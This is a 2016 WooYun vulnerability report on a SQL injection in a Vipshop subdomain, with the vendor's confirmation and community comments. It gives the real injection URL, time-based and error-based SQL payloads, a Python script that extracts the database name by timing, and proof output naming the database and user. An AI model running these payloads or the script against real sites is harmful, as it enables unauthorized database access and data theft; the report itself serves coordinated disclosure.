当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0195738

漏洞标题:唯品会某分站SQL注入漏洞 (附利用技巧)

相关厂商:唯品会

漏洞作者: 猪猪侠

提交时间:2016-04-13 09:59

修复时间:2016-05-28 17:20

公开时间:2016-05-28 17:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-13: 细节已通知厂商并且等待厂商处理中
2016-04-13: 厂商已经确认,细节仅向厂商公开
2016-04-23: 细节向核心白帽子及相关领域专家公开
2016-05-03: 细节向普通白帽子公开
2016-05-13: 细节向实习白帽子公开
2016-05-28: 细节向公众公开

简要描述:

唯品会某分站SQL注入漏洞
那么高端的WAF,为什么不启用呢?

详细说明:

#1 注入点
http://share.vip.com/Acts/SetCount?id=63200
#2 PAYLOAD, 5秒后打开网页
http://share.vip.com/Acts/SetCount?id=63200' AND (SELECT * FROM (SELECT(SLEEP(5)))RING) and 'RING'='RING
#3 基于时间差注入

(SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(DATABASE())," + str(i) + ",1))=" + str(ord(_str)) + ")*5)))RING)


#* 另一种注入方式

http://share.vip.com/Acts/SetCount?id=63200' and if((1=2),1,(select 1 union select 2))#

漏洞证明:

#4 EXP

#!/usr/bin/env python
# encoding: utf-8
# vip_new.py 
# ringzero@0x557.org
import requests
import time
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
for i in range(1,20):
    for _str in payloads:
        start_time = time.time()
        url = "http://share.vip.com/Acts/SetCount?id=63200' AND (SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(DATABASE())," + str(i) + ",1))=" + str(ord(_str)) + ")*5)))RING) AND 'RING'='RING"
        result = requests.get(url).text
        if(time.time() - start_time) > 3:
            print _str
            break


#5 注入证明

database()
vipshop_share
user()
vipshop_share@10.201.51.***

修复方案:

那么高端的WAF,为什么不启用呢?

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-13 17:11

厂商回复:

您好,经确认,该问题真实存在且影响高危,已联系相关人员处理,感谢对我们业务的支持与贡献!

最新状态:

暂无

漏洞评价:

评价

  1. 2016-04-13 10:04 | 随风的风 ( 普通白帽子 | Rank:255 漏洞数:94 | 微信公众号:233sec 不定期分享各种漏洞思...)

    那么高端的WAF,为什么不启用呢?

  2. 2016-04-13 10:05 | ADVERT ( 实习白帽子 | Rank:87 漏洞数:26 | Stay hungry,stay foolish.)

    学习一下。

  3. 2016-04-13 10:11 | 小苹果 ( 普通白帽子 | Rank:241 漏洞数:60 | 只要锄头挥的好,哪有洞挖不到)

    怎么知道他有那么高端的waf

  4. 2016-04-13 10:11 | backtrack丶yao ( 普通白帽子 | Rank:298 漏洞数:110 )

    那么高端的WAF,为什么不启用呢?

  5. 2016-04-13 10:13 | Taro ( 普通白帽子 | Rank:329 漏洞数:81 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    又是waf惹的祸,背锅了

  6. 2016-04-13 10:14 | linkey ( 实习白帽子 | Rank:89 漏洞数:38 | sqlmap的超爱好者)

    这。waf很高端?

  7. 2016-04-13 10:30 | just_joker ( 普通白帽子 | Rank:124 漏洞数:22 | ..........)

    那么启用的WAF,为什么不高端呢?

  8. 2016-04-13 10:42 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

    目测脱裤会触发。try it

  9. 2016-04-13 10:48 | bit4 ( 路人 | Rank:18 漏洞数:3 | 终于,我也是有ID的人了!)

    @齐迹 能跑出注入点和数据库列表,但是如果尝试拖库就会封IP,是不是就是waf惹的祸?大神有识别waf的神器么?

  10. 2016-04-13 12:08 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:5112 漏洞数:394 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    附带了一个利用技巧

  11. 2016-04-13 12:22 | bit4 ( 路人 | Rank:18 漏洞数:3 | 终于,我也是有ID的人了!)

    @猪猪侠 猪哥威武,期待公开~~

  12. 2016-04-13 17:31 | ANS5 ( 普通白帽子 | Rank:347 漏洞数:106 | 此心安处是吾乡)

    期待公开利用技巧。。。

  13. 2016-04-13 17:37 | tSt ( 普通白帽子 | Rank:109 漏洞数:30 | 在开发里运维最强,运维里网络最强,网络里...)

    那么高端的WAF,为什么不启用呢?

  14. 2016-04-13 18:21 | 齐迹 ( 普通白帽子 | Rank:804 漏洞数:104 | 重庆地区招聘安全工程师。sec.zbj.com欢迎...)

    @bit4 waf可以做到,但是你遇到的场景是不是那就不能肯定了

  15. 2016-04-13 19:02 | Rand0m ( 实习白帽子 | Rank:42 漏洞数:11 | 竟然还有人冒充我,醉了,骗子QQ:44569754...)

    前排坐等公开

  16. 2016-04-14 08:29 | Dotaer ( 路人 | Rank:20 漏洞数:5 | 多学习,多挖洞!)

    大哥,收小弟不?

  17. 2016-04-14 14:11 | dragon110 ( 路人 | Rank:4 漏洞数:2 | 谨言、慎行、多思。)

    期待